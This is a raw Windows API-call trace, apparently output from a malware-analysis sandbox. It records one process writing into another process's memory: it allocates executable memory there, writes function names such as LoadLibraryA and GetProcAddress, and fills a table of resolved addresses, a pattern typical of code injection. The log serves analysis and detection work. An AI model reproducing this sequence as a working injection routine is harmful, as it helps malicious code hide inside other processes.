	[0187.660] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.660] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.660] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.660] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.660] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.661] ResetEvent (hEvent=0x478) returned 1
	[0187.661] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.661] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.661] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.661] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.661] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.661] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550c8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.662] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.662] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.662] lstrlenA (lpString="lstrcmpiA") returned 9
	[0187.662] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.662] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb78fa*, nSize=0xa, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb78fa*, lpNumberOfBytesWritten=0x12857c*=0xa) returned 1
	[0187.662] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.662] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.662] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.662] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.663] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.663] ResetEvent (hEvent=0x478) returned 1
	[0187.663] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.663] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.663] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.663] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.663] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.664] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550cc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.664] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.664] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.664] lstrlenA (lpString="GetLastError") returned 12
	[0187.664] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.664] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6d12*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6d12*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.665] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.665] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.665] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.665] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.665] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.665] ResetEvent (hEvent=0x478) returned 1
	[0187.665] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.666] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.666] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.666] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.666] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.666] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550d0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.666] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.666] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.666] lstrlenA (lpString="FlushInstructionCache") returned 21
	[0187.667] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.667] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6cfa*, nSize=0x16, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6cfa*, lpNumberOfBytesWritten=0x12857c*=0x16) returned 1
	[0187.667] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.667] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.667] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.667] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.667] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.668] ResetEvent (hEvent=0x478) returned 1
	[0187.668] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.668] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.668] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.668] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.668] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.668] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550d4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.669] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.669] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.669] lstrlenA (lpString="FreeLibrary") returned 11
	[0187.669] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.669] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6cec*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6cec*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0187.669] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.669] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.669] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.669] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.670] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.670] ResetEvent (hEvent=0x478) returned 1
	[0187.670] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.670] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.670] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.670] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.670] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.671] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550d8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.671] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.671] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.671] lstrlenA (lpString="ReadProcessMemory") returned 17
	[0187.671] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.671] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6cd8*, nSize=0x12, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6cd8*, lpNumberOfBytesWritten=0x12857c*=0x12) returned 1
	[0187.672] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.672] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.672] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.672] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.672] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.672] ResetEvent (hEvent=0x478) returned 1
	[0187.672] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.673] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.673] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.673] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.673] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.673] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550dc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.673] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.673] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.673] lstrlenA (lpString="VirtualAllocEx") returned 14
	[0187.673] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.674] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6cc6*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6cc6*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0187.674] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.674] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.674] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.674] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.674] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.675] ResetEvent (hEvent=0x478) returned 1
	[0187.675] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.675] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.675] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.675] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.675] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.675] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550e0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.676] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.676] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.676] lstrlenA (lpString="GetProcAddress") returned 14
	[0187.676] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.676] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6cb4*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6cb4*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0187.676] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.676] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.676] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.676] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.677] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.677] ResetEvent (hEvent=0x478) returned 1
	[0187.677] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.677] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.677] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.677] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.677] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.677] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550e4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.678] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.678] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.678] lstrlenA (lpString="GetNativeSystemInfo") returned 19
	[0187.678] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.678] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6c9e*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6c9e*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0187.679] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.679] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.679] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.679] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.679] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.679] ResetEvent (hEvent=0x478) returned 1
	[0187.679] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.680] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.680] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.680] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.680] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.680] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550e8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.680] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.680] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.680] lstrlenA (lpString="GetVersionExA") returned 13
	[0187.680] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.680] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6c8e*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6c8e*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0187.681] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.681] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.681] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.681] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.681] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.682] ResetEvent (hEvent=0x478) returned 1
	[0187.682] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.682] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.682] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.682] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.682] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.682] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550ec, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.683] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.683] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.683] lstrlenA (lpString="LoadLibraryA") returned 12
	[0187.683] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.683] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6c7e*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6c7e*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.683] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.683] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.683] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.683] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.684] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.684] ResetEvent (hEvent=0x478) returned 1
	[0187.684] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
